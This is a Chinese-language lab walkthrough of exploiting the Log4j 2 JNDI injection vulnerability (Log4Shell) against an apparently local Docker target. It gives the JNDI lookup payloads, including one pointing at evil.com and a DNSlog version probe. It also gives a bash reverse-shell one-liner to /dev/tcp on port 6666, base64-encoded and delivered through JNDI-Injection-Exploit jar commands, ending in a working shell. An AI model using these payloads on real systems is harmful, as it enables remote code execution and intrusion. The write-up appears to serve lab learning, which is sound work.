Apache Log4j 2 是Java语言的日志处理套件,使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}
的lookup用于进行JNDI注入,执行任意代码。
漏洞验证
开启docker镜像,进入8983端口
选择该Poc
${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
##################################################
sys:java.bersion 大致意思就是一个系统命令,可以查看Java版本
构造一个dns连接地址
将地址填入上方的poc中并进行利用
进入到该页面后,返回Dnslog平台查看数据返回,成功发现java版本,漏洞验证成功
漏洞利用
下载JNDI注入工具,
利用漏洞需要用到的反弹shell的命令
bash -i >& /dev/tcp/ip/6666 0>&1
ip就是要反弹到的主机的ip
6666是监听端口
再对这条命令进行base64编码
加密完成后,构造payload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzMvNjY2NiAwPiYxCgo=}|{base64,-d}|{bash,-i}" -A "192.168.1.33"
#-C后面的参数是要执行的命令以及编码方式,-A后面就是对应ip地址;base64,-d 表示用base64来解码
启动rmi和ldap服务器
可以看到这个工具为我们生成了几个有恶意流量导向的地址
此时开启6666端口监听
此时返回刚才的网站进行JNDI注入,构造url
发现本该重定向到恶意地址的网站回显连接失败
参考了多篇文章仍然无果
一筹莫展时发现
更换了解码平台之后就能利用成功了
重新构造
java -jar /root/桌面/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAyLjY2LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "172.16.102.66"
返回刚才的页面将恶意的流量导向url填进去
返回kali,发现导向成功
查看监听的端口并发送whoami指令
漏洞利用成功